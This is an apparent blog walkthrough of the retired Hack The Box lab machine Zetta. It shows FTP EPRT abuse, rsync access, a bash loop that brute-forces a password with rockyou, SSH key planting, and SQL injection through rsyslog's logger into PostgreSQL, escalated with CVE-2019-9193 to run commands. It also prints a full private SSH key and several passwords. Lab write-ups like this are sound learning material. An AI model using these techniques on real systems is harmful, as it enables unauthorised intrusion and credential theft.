MACHINE DATA
- IP address: 10.10.10.156
- OS: Linux
- Rating: Hard
- Points: 40
- Phased out: Feb 21st 2020
Initial foothold and user
Nmap reveals only the following services- SSH
- FTP
- HTTP
- Any 32 char combination are valid user and password for ftp service: this doesn’t lead to an access to files or folders and it doesn’t seem to be vulnerable (PureFTPd)
- The webpage mentionsRFC 2428 which defines FXP extension for FTP protocol: maybe this FTP supports FXP extensions
I can connect to port 21 with telnet and type in any 32 hex sequence as user and password
Now I can use the command EPRT (define in RFC 2428) to tell the FTP that my computer can be contacted on port 26000 for FXP extensions.
And then use a command STOR pass.txt to use this FXP extensions.
The file pass.txt is not needed: I only need Zetta to contact my computer on port 26000 and on IPv6 protocol to find Zetta IPv6 address:
And looking at tcpdump output:
I can find the IPv6 address of Zetta is: dead:beef::250:56ff:febd:1dbe
And the next step is to scan Zetta on IPv6:
There is an additional port that can be interesting.
I can connect to it and find that it is a rsync server used for backup purposes.
So now I can try to get a copy of /etc/ folder from remote server to my local computer:
rsync -6
rsync://root@[dead:beef:0:0:250:56ff:febd:1dbe]:8730/etc/* rsync/
Unfortunately the /etc/ folder doesn't reveal any secrets (shadow file or other things), but there is the rsync configuration file that has an interesting section:
[home_roy]
path = /home/roy
read only = no
# Authenticate user for security reasons.
uid = roy
gid = roy
auth users = roy
secrets file = /etc/rsyncd.secrets
# Hide home module so that no one tries to access it.
list = false
There is a misconfiguration because the folder is not in read only, so the user roy can use rsync to upload files
First step is to get a copy of the folder but I don't have the password of roy user so I have to bruteforce it with rockyou
for i in $(head -n 1000 rockyou.txt); do
echo
$i;
echo
$i| rsync -6 --password-file=-
rsync://roy@[dead:beef:0:0:250:56ff:febd:871]:8730/home_roy/* roy ;
if
[ $? -eq 0 ];
then
echo
password is $i
exit
1
fi
done
After a few minutes I got the password of roy, which is computer
Using rsync I can get a copy of roy home and I can find a .tudu.xml file in it which contains an obscure hint which will be useful later for root escalation:
I can leverage the write option to upload an authorized_keys file of my choice to use for SSH authentication:
root@NikITA:~/HTB/Zetta# rsync -6 -a
authorized_keys
rsync://roy@[dead:beef::250:56ff:febd:871]:8730/home_roy/.ssh/
****** UNAUTHORIZED ACCESS TO THIS RSYNC
SERVER IS PROHIBITED ******
You must have explicit, authorized permission
to access this rsync
server. Unauthorized attempts and actions
to access or use this
system may result in civil and/or
criminal penalties.
All activities performed on this device
are logged and monitored.
****** UNAUTHORIZED ACCESS TO THIS RSYNC
SERVER IS PROHIBITED ******
@ZE::A staff
This rsync server is solely for access to
the zetta master server.
The modules you see are either provided
for "Backup access" or for
"Cloud sync".
Password:
root@NikITA:~/HTB/Zetta# ssh
roy@10.10.10.156
Linux zetta
4.19.0-5-amd64 #1 SMP Debian 4.19.37-5+deb10u1 (2019-07-19) x86_64
Last login: Sat Aug 31 15:43:18 2019 from
10.10.14.2
roy@zetta:~$ id
uid=1000(roy) gid=1000(roy) groups=1000(roy),4(adm),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
roy@zetta:~$ cat user.txt
a575bdb345f2de0a3172c8282452be91
roy@zetta:~$
That concludes user escalation for Zetta
Root escalation
Looking around with roy user I found a git repo in
/etc/rsyslog.d folder: this containes the config file of rsyslog that has
a special config to store log messages in postgreSQL database.
Here is the config:
template(name="sql-syslog"
type="list" option.sql="on") {
constant(value="INSERT INTO systemevents
(message, devicereportedtime) values ('")
property(name="msg")
constant(value="','")
property(name="timereported"
dateformat="pgsql" date.inUTC="on")
constant(value="')")
}
# load
module
module(load="ompgsql")
# Only
forward local7.info for testing.
local7.info
action(type="ompgsql" server="localhost"
user="postgres" pass="*******" db="Syslog"
template="sql-syslog")
I believe that there is a way to exploit this by triggering a specially crafted syslog message
The exploitation requires some effort to find the correct message so I decide to reproduce the config on my machine and try many combinations until I find a way to execute code.
The basic idea here is to use the logger command with the correct facility to send a message with the correct quote and escaping characters to execute SQL commands in PostgreSQL.
For example I was able to get the version of PostegreSQL with this command:
echo "',NULL); SELECT version();-- “ | logger -p local7.info
The version of the postgreSQL will be written in the table systemevents.
The reasons of reproducing the setup on my machine is that I can look at the PostgreSQL content, while i don't have any credetnails on Zetta for that.
Now that I can execute SQL commands I can leverage CVE-2019-9193 as stated on
PayloadsAllTheThings
to execute Linux OS commands from inside PostgreSQL.
The original exploit is
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY
cmd_exec FROM PROGRAM 'id';
But I have to "encapsulate" it in the logger messages like this (please note the special escaping \$$ to get the apostrophe character to be correctly sent to PostgreSQL:
echo "',NULL); DROP TABLE IF EXISTS cmd_exec;-- " | logger -p local7.info
echo "',NULL); CREATE TABLE cmd_exec(cmd_output text);-- " | logger -p local7.info
echo "',NULL); COPY cmd_exec FROM PROGRAM \$$ id \$$;-- " | logger -p local7.info
Once I'm able to execute commands, I can do anything, like listing content of folder, with some ls commands I can find that postgresql has a private ssh key, and I can copy it in tmp and make world readable with this commands:
echo
"',NULL); DROP TABLE IF EXISTS cmd_exec;-- " | logger -p local7.info
echo
"',NULL); CREATE TABLE cmd_exec(cmd_output text);-- " | logger -p local7.info
echo
"',NULL); COPY cmd_exec FROM PROGRAM \$$ cp
/var/lib/postgresql/.ssh/id_rsa /tmp/a \$$;-- " | logger -p local7.info
echo
"',NULL); COPY cmd_exec FROM PROGRAM \$$ chmod 777 /tmp/a \$$;--
" | logger -p local7.info
The content of the id-rsa key is:
-----BEGIN
OPENSSH PRIVATE KEY-----
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
-----END
OPENSSH PRIVATE KEY-----
And I can use it to connect to zetta as postgres user:
Once inside as postgres user I can look at the history and I can find the command that originally created the postgres user as:
So the postgres user has a password: sup3rs3cur3p4ass@postgres
Remembering the hint in .tudu.xml file I can guess that the password of root user is sup3rs3cur3p4ass@root
And, yes it is:
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.